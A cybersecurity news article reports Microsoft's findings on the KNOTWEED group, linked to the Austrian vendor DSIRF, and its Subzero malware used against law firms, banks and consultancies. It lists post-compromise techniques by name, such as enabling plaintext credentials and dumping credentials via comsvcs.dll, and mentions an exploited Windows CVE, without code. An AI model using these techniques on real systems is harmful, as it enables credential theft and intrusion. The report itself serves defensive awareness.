Microsoft reported Subzero attacks against Microsoft customers in Austria, the United Kingdom, and Panama. The targeted entities are law firms, banks, and strategic consultancies. MSTIC states that the KNOTWEED’s Subzero malware was deployed in multiple ways, the IT giant referred the different stages of Subzero malware as Jumplump for the persistent loader and Corelump for the main malware.
Once compromised the system, threat actors drop the Corelump downloader and inject it directly in memory to evade detection. It supports multiple features, including keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins downloaded from KNOTWEED’s C2 server.
Microsoft researchers observed a variety of post-compromise actions on infected systems:
- Setting of UseLogonCredential to “1” to enable plaintext credentials
- Credential dumping via comsvcs.dll
- Attempt to access emails with dumped credentials from a KNOTWEED IP address
- Using Curl to download KNOTWEED tooling from public file shares such as vultrobjects[.]com
- Running PowerShell scripts directly from a GitHub gist created by an account associated with DSIRF
- Researchers from threat intelligence firm RiskIQ, using passive DNS data related to Knotweed attacks, linked the C2 infrastructure used by the malware since February 2020 to DSIRF.
One of the zero-day exploits used in Knotweed attacks was triggering the recently patched CVE-2022-22047 issue. The attackers used this exploit to escalate privileges, escape sandboxes, and gain system-level code execution on the vulnerable system.
Microsoft: Windows, Adobe Zero-Days Used to Deploy Subzero Malware
Microsoft has linked a threat group known as Knotweed to an Austrian spyware vendor also operating as a cyber mercenary outfit named DSIRF that targets European and Central American entities using a malware toolset dubbed Subzero.
On its website, DSIRF promotes itself as a company that provides information research, forensics, and data-driven intelligence services to corporations.
However, it has been linked to the development of the Subzero malware that its customers can use to hack targets’ phones, computers, and network and internet-connected devices.
More Cyber Security news and articles: Visit https://QUE.com/tag/cybersecurity